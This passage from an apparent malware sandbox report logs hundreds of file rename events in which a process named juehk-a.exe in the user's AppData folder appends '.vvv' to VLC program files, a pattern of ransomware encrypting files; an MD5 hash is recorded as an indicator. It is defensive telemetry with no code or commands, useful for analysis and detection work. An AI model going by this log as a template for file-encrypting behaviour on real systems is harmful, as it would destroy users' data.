34089.          fid (ads:): 562949953517673
34090.          ntstatus: 0x0
34091.          CreateOptions: 0x0
34092.        file:
34093.          timestamp: 104592
34094.          mode: rename
34095.          sequenceNumber: 2391
34096.          filesize: 574
34097.          processinfo:
34098.            pid: 1648
34099.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34100.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34101.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png
34102.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png.vvv
34103.            ads:
34104.          fid (ads:): 562949953517674
34105.          ntstatus: 0x0
34106.          CreateOptions: 0x0
34107.        file:
34108.          timestamp: 104607
34109.          mode: rename
34110.          sequenceNumber: 2392
34111.          filesize: 526
34112.          processinfo:
34113.            pid: 1648
34114.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34115.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34116.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png
34117.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png.vvv
34118.            ads:
34119.          fid (ads:): 562949953517675
34120.          ntstatus: 0x0
34121.          CreateOptions: 0x0
34122.        file:
34123.          timestamp: 104617
34124.          mode: rename
34125.          sequenceNumber: 2393
34126.          filesize: 542
34127.          processinfo:
34128.            pid: 1648
34129.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34130.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34131.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png
34132.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png.vvv
34133.            ads:
34134.          fid (ads:): 562949953517676
34135.          ntstatus: 0x0
34136.          CreateOptions: 0x0
34137.        file:
34138.          timestamp: 104627
34139.          mode: rename
34140.          sequenceNumber: 2394
34141.          filesize: 510
34142.          processinfo:
34143.            pid: 1648
34144.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34145.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34146.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png
34147.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png.vvv
34148.            ads:
34149.          fid (ads:): 562949953517677
34150.          ntstatus: 0x0
34151.          CreateOptions: 0x0
34152.        file:
34153.          timestamp: 104636
34154.          mode: rename
34155.          sequenceNumber: 2395
34156.          filesize: 3054
34157.          processinfo:
34158.            pid: 1648
34159.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34160.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34161.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png
34162.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png.vvv
34163.            ads:
34164.          fid (ads:): 562949953517678
34165.          ntstatus: 0x0
34166.          CreateOptions: 0x0
34167.        file:
34168.          timestamp: 104646
34169.          mode: rename
34170.          sequenceNumber: 2396
34171.          filesize: 510
34172.          processinfo:
34173.            pid: 1648
34174.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34175.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34176.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png
34177.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.vvv
34178.            ads:
34179.          fid (ads:): 562949953517679
34180.          ntstatus: 0x0
34181.          CreateOptions: 0x0
34182.        file:
34183.          timestamp: 104657
34184.          mode: rename
34185.          sequenceNumber: 2397
34186.          filesize: 542
34187.          processinfo:
34188.            pid: 1648
34189.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34190.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34191.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png
34192.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png.vvv
34193.            ads:
34194.          fid (ads:): 562949953517680
34195.          ntstatus: 0x0
34196.          CreateOptions: 0x0
34197.        file:
34198.          timestamp: 104667
34199.          mode: rename
34200.          sequenceNumber: 2398
34201.          filesize: 4622
34202.          processinfo:
34203.            pid: 1648
34204.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34205.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34206.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png
34207.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png.vvv
34208.            ads:
34209.          fid (ads:): 562949953517681
34210.          ntstatus: 0x0
34211.          CreateOptions: 0x0
34212.        file:
34213.          timestamp: 104676
34214.          mode: rename
34215.          sequenceNumber: 2399
34216.          filesize: 5518
34217.          processinfo:
34218.            pid: 1648
34219.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34220.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34221.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png
34222.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png.vvv
34223.            ads:
34224.          fid (ads:): 562949953517682
34225.          ntstatus: 0x0
34226.          CreateOptions: 0x0
34227.        file:
34228.          timestamp: 104687
34229.          mode: rename
34230.          sequenceNumber: 2400
34231.          filesize: 4622
34232.          processinfo:
34233.            pid: 1648
34234.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34235.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34236.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png
34237.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png.vvv
34238.            ads:
34239.          fid (ads:): 562949953517683
34240.          ntstatus: 0x0
34241.          CreateOptions: 0x0
34242.        file:
34243.          timestamp: 104701
34244.          mode: rename
34245.          sequenceNumber: 2401
34246.          filesize: 4622
34247.          processinfo:
34248.            pid: 1648
34249.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34250.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34251.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png
34252.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png.vvv
34253.            ads:
34254.          fid (ads:): 562949953517684
34255.          ntstatus: 0x0
34256.          CreateOptions: 0x0
34257.        file:
34258.          timestamp: 104720
34259.          mode: rename
34260.          sequenceNumber: 2402
34261.          filesize: 4622
34262.          processinfo:
34263.            pid: 1648
34264.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34265.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34266.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png
34267.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png.vvv
34268.            ads:
34269.          fid (ads:): 562949953517685
34270.          ntstatus: 0x0
34271.          CreateOptions: 0x0
34272.        file:
34273.          timestamp: 104734
34274.          mode: rename
34275.          sequenceNumber: 2403
34276.          filesize: 33998
34277.          processinfo:
34278.            pid: 1648
34279.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34280.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34281.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css
34282.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css.vvv
34283.            ads:
34284.          fid (ads:): 562949953517670
34285.          ntstatus: 0x0
34286.          CreateOptions: 0x0
34287.        file:
34288.          timestamp: 104784
34289.          mode: rename
34290.          sequenceNumber: 2404
34291.          filesize: 5102
34292.          processinfo:
34293.            pid: 1648
34294.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34295.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34296.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png
34297.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png.vvv
34298.            ads:
34299.          fid (ads:): 562949953517705
34300.          ntstatus: 0x0
34301.          CreateOptions: 0x0
34302.        file:
34303.          timestamp: 104818
34304.          mode: rename
34305.          sequenceNumber: 2405
34306.          filesize: 2446
34307.          processinfo:
34308.            pid: 1648
34309.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34310.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34311.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png
34312.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png.vvv
34313.            ads:
34314.          fid (ads:): 562949953517706
34315.          ntstatus: 0x0
34316.          CreateOptions: 0x0
34317.        file:
34318.          timestamp: 104873
34319.          mode: rename
34320.          sequenceNumber: 2406
34321.          filesize: 12382
34322.          processinfo:
34323.            pid: 1648
34324.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34325.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34326.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png
34327.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png.vvv
34328.            ads:
34329.          fid (ads:): 562949953517710
34330.          ntstatus: 0x0
34331.          CreateOptions: 0x0
34332.        file:
34333.          timestamp: 104953
34334.          mode: rename
34335.          sequenceNumber: 2407
34336.          filesize: 1774
34337.          processinfo:
34338.            pid: 1648
34339.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34340.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34341.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png
34342.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png.vvv
34343.            ads:
34344.          fid (ads:): 562949953517707
34345.          ntstatus: 0x0
34346.          CreateOptions: 0x0
34347.        file:
34348.          timestamp: 105029
34349.          mode: rename
34350.          sequenceNumber: 2408
34351.          filesize: 3342
34352.          processinfo:
34353.            pid: 1648
34354.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34355.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34356.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png
34357.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png.vvv
34358.            ads:
34359.          fid (ads:): 562949953517708
34360.          ntstatus: 0x0
34361.          CreateOptions: 0x0
34362.        file:
34363.          timestamp: 105049
34364.          mode: rename
34365.          sequenceNumber: 2409
34366.          filesize: 1358
34367.          processinfo:
34368.            pid: 1648
34369.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34370.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34371.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png
34372.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png.vvv
34373.            ads:
34374.          fid (ads:): 562949953517711
34375.          ntstatus: 0x0
34376.          CreateOptions: 0x0
34377.        file:
34378.          timestamp: 105065
34379.          mode: rename
34380.          sequenceNumber: 2410
34381.          filesize: 5534
34382.          processinfo:
34383.            pid: 1648
34384.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34385.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34386.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png
34387.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png.vvv
34388.            ads:
34389.          fid (ads:): 562949953517709
34390.          ntstatus: 0x0
34391.          CreateOptions: 0x0
34392.        file:
34393.          timestamp: 105077
34394.          mode: rename
34395.          sequenceNumber: 2411
34396.          filesize: 16302
34397.          processinfo:
34398.            pid: 1648
34399.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34400.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34401.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png
34402.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png.vvv
34403.            ads:
34404.          fid (ads:): 562949953517712
34405.          ntstatus: 0x0
34406.          CreateOptions: 0x0
34407.        file:
34408.          timestamp: 105087
34409.          mode: rename
34410.          sequenceNumber: 2412
34411.          filesize: 1022
34412.          processinfo:
34413.            pid: 1648
34414.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34415.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34416.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png
34417.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png.vvv
34418.            ads:
34419.          fid (ads:): 562949953517713
34420.          ntstatus: 0x0
34421.          CreateOptions: 0x0
34422.        file:
34423.          timestamp: 105108
34424.          mode: rename
34425.          sequenceNumber: 2413
34426.          filesize: 5582
34427.          processinfo:
34428.            pid: 1648
34429.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34430.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34431.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\js\common.js
34432.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\js\common.js.vvv
34433.            ads:
34434.          fid (ads:): 562949953517715
34435.          ntstatus: 0x0
34436.          CreateOptions: 0x0
34437.        file:
34438.          timestamp: 105118
34439.          mode: rename
34440.          sequenceNumber: 2414
34441.          filesize: 24398
34442.          processinfo:
34443.            pid: 1648
34444.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34445.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34446.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\js\controlers.js
34447.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\js\controlers.js.vvv
34448.            ads:
34449.          fid (ads:): 562949953517716
34450.          ntstatus: 0x0
34451.          CreateOptions: 0x0
34452.        file:
34453.          timestamp: 105128
34454.          mode: rename
34455.          sequenceNumber: 2415
34456.          filesize: 87518
34457.          processinfo:
34458.            pid: 1648
34459.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34460.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34461.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\js\jquery-1.5.1.min.js
34462.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\js\jquery-1.5.1.min.js.vvv
34463.            ads:
34464.          fid (ads:): 562949953517717
34465.          ntstatus: 0x0
34466.          CreateOptions: 0x0
34467.        file:
34468.          timestamp: 105144
34469.          mode: rename
34470.          sequenceNumber: 2416
34471.          filesize: 213166
34472.          processinfo:
34473.            pid: 1648
34474.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34475.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34476.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\js\jquery-ui-1.8.13.custom.min.js
34477.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\js\jquery-ui-1.8.13.custom.min.js.vvv
34478.            ads:
34479.          fid (ads:): 562949953517718
34480.          ntstatus: 0x0
34481.          CreateOptions: 0x0
34482.        file:
34483.          timestamp: 105156
34484.          mode: rename
34485.          sequenceNumber: 2417
34486.          filesize: 184878
34487.          processinfo:
34488.            pid: 1648
34489.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34490.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34491.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js
34492.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js.vvv
34493.            ads:
34494.          fid (ads:): 562949953517719
34495.          ntstatus: 0x0
34496.          CreateOptions: 0x0
34497.        file:
34498.          timestamp: 105167
34499.          mode: rename
34500.          sequenceNumber: 2418
34501.          filesize: 4462
34502.          processinfo:
34503.            pid: 1648
34504.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34505.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34506.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js
34507.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js.vvv
34508.            ads:
34509.          fid (ads:): 562949953517720
34510.          ntstatus: 0x0
34511.          CreateOptions: 0x0
34512.        file:
34513.          timestamp: 105202
34514.          mode: rename
34515.          sequenceNumber: 2419
34516.          filesize: 542
34517.          processinfo:
34518.            pid: 1648
34519.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34520.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34521.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\delete.png
34522.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\delete.png.vvv
34523.            ads:
34524.          fid (ads:): 562949953517724
34525.          ntstatus: 0x0
34526.          CreateOptions: 0x0
34527.        file:
34528.          timestamp: 105210
34529.          mode: rename
34530.          sequenceNumber: 2420
34531.          filesize: 510
34532.          processinfo:
34533.            pid: 1648
34534.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34535.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34536.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\delete_small.png
34537.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\delete_small.png.vvv
34538.            ads:
34539.          fid (ads:): 562949953517725
34540.          ntstatus: 0x0
34541.          CreateOptions: 0x0
34542.        file:
34543.          timestamp: 105221
34544.          mode: rename
34545.          sequenceNumber: 2421
34546.          filesize: 510
34547.          processinfo:
34548.            pid: 1648
34549.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34550.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34551.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\eject.png
34552.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\eject.png.vvv
34553.            ads:
34554.          fid (ads:): 562949953517726
34555.          ntstatus: 0x0
34556.          CreateOptions: 0x0
34557.        file:
34558.          timestamp: 105230
34559.          mode: rename
34560.          sequenceNumber: 2422
34561.          filesize: 542
34562.          processinfo:
34563.            pid: 1648
34564.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34565.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34566.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\empty.png
34567.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\empty.png.vvv
34568.            ads:
34569.          fid (ads:): 562949953517727
34570.          ntstatus: 0x0
34571.          CreateOptions: 0x0
34572.        file:
34573.          timestamp: 105240
34574.          mode: rename
34575.          sequenceNumber: 2423
34576.          filesize: 542
34577.          processinfo:
34578.            pid: 1648
34579.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34580.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34581.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\fullscreen.png
34582.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\fullscreen.png.vvv
34583.            ads:
34584.          fid (ads:): 562949953517728
34585.          ntstatus: 0x0
34586.          CreateOptions: 0x0
34587.        file:
34588.          timestamp: 105250
34589.          mode: rename
34590.          sequenceNumber: 2424
34591.          filesize: 526
34592.          processinfo:
34593.            pid: 1648
34594.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34595.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34596.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\help.png
34597.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\help.png.vvv
34598.            ads:
34599.          fid (ads:): 562949953517729
34600.          ntstatus: 0x0
34601.          CreateOptions: 0x0
34602.        file:
34603.          timestamp: 105259
34604.          mode: rename
34605.          sequenceNumber: 2425
34606.          filesize: 558
34607.          processinfo:
34608.            pid: 1648
34609.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34610.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34611.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\info.png
34612.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\info.png.vvv
34613.            ads:
34614.          fid (ads:): 562949953517730
34615.          ntstatus: 0x0
34616.          CreateOptions: 0x0
34617.        file:
34618.          timestamp: 105270
34619.          mode: rename
34620.          sequenceNumber: 2426
34621.          filesize: 526
34622.          processinfo:
34623.            pid: 1648
34624.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34625.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34626.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\loop.png
34627.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\loop.png.vvv
34628.            ads:
34629.          fid (ads:): 562949953517731
34630.          ntstatus: 0x0
34631.          CreateOptions: 0x0
34632.        file:
34633.          timestamp: 105279
34634.          mode: rename
34635.          sequenceNumber: 2427
34636.          filesize: 526
34637.          processinfo:
34638.            pid: 1648
34639.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34640.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34641.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\minus.png
34642.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\minus.png.vvv
34643.            ads:
34644.          fid (ads:): 562949953517732
34645.          ntstatus: 0x0
34646.          CreateOptions: 0x0
34647.        file:
34648.          timestamp: 105293
34649.          mode: rename
34650.          sequenceNumber: 2428
34651.          filesize: 526
34652.          processinfo:
34653.            pid: 1648
34654.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34655.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34656.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\next.png
34657.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\next.png.vvv
34658.            ads:
34659.          fid (ads:): 562949953517733
34660.          ntstatus: 0x0
34661.          CreateOptions: 0x0
34662.        file:
34663.          timestamp: 105298
34664.          mode: rename
34665.          sequenceNumber: 2429
34666.          filesize: 510
34667.          processinfo:
34668.            pid: 1648
34669.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34670.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34671.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\pause.png
34672.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\pause.png.vvv
34673.            ads:
34674.          fid (ads:): 562949953517734
34675.          ntstatus: 0x0
34676.          CreateOptions: 0x0
34677.        file:
34678.          timestamp: 105306
34679.          mode: rename
34680.          sequenceNumber: 2430
34681.          filesize: 526
34682.          processinfo:
34683.            pid: 1648
34684.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34685.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34686.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\play.png
34687.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\play.png.vvv
34688.            ads:
34689.          fid (ads:): 562949953517735
34690.          ntstatus: 0x0
34691.          CreateOptions: 0x0
34692.        file:
34693.          timestamp: 105315
34694.          mode: rename
34695.          sequenceNumber: 2431
34696.          filesize: 510
34697.          processinfo:
34698.            pid: 1648
34699.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34700.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34701.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\playlist.png
34702.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\playlist.png.vvv
34703.            ads:
34704.          fid (ads:): 562949953517736
34705.          ntstatus: 0x0
34706.          CreateOptions: 0x0
34707.        file:
34708.          timestamp: 105323
34709.          mode: rename
34710.          sequenceNumber: 2432
34711.          filesize: 510
34712.          processinfo:
34713.            pid: 1648
34714.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34715.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34716.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\playlist_small.png
34717.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\playlist_small.png.vvv
34718.            ads:
34719.          fid (ads:): 562949953517737
34720.          ntstatus: 0x0
34721.          CreateOptions: 0x0
34722.        file:
34723.          timestamp: 105332
34724.          mode: rename
34725.          sequenceNumber: 2433
34726.          filesize: 542
34727.          processinfo:
34728.            pid: 1648
34729.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34730.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34731.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\plus.png
34732.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\plus.png.vvv
34733.            ads:
34734.          fid (ads:): 562949953517738
34735.          ntstatus: 0x0
34736.          CreateOptions: 0x0
34737.        file:
34738.          timestamp: 105340
34739.          mode: rename
34740.          sequenceNumber: 2434
34741.          filesize: 526
34742.          processinfo:
34743.            pid: 1648
34744.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34745.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34746.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\prev.png
34747.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\prev.png.vvv
34748.            ads:
34749.          fid (ads:): 562949953517739
34750.          ntstatus: 0x0
34751.          CreateOptions: 0x0
34752.        file:
34753.          timestamp: 105348
34754.          mode: rename
34755.          sequenceNumber: 2435
34756.          filesize: 574
34757.          processinfo:
34758.            pid: 1648
34759.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34760.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34761.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\refresh.png
34762.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\refresh.png.vvv
34763.            ads:
34764.          fid (ads:): 562949953517740
34765.          ntstatus: 0x0
34766.          CreateOptions: 0x0
34767.        file:
34768.          timestamp: 105356
34769.          mode: rename
34770.          sequenceNumber: 2436
34771.          filesize: 526
34772.          processinfo:
34773.            pid: 1648
34774.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34775.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34776.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\repeat.png
34777.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\repeat.png.vvv
34778.            ads:
34779.          fid (ads:): 562949953517741
34780.          ntstatus: 0x0
34781.          CreateOptions: 0x0
34782.        file:
34783.          timestamp: 105364
34784.          mode: rename
34785.          sequenceNumber: 2437
34786.          filesize: 558
34787.          processinfo:
34788.            pid: 1648
34789.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34790.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34791.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\reset.png
34792.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\reset.png.vvv
34793.            ads:
34794.          fid (ads:): 562949953517742
34795.          ntstatus: 0x0
34796.          CreateOptions: 0x0
34797.        file:
34798.          timestamp: 105372
34799.          mode: rename
34800.          sequenceNumber: 2438
34801.          filesize: 542
34802.          processinfo:
34803.            pid: 1648
34804.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34805.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34806.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\sd.png
34807.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\sd.png.vvv
34808.            ads:
34809.          fid (ads:): 562949953517743
34810.          ntstatus: 0x0
34811.          CreateOptions: 0x0
34812.        file:
34813.          timestamp: 105380
34814.          mode: rename
34815.          sequenceNumber: 2439
34816.          filesize: 526
34817.          processinfo:
34818.            pid: 1648
34819.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34820.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
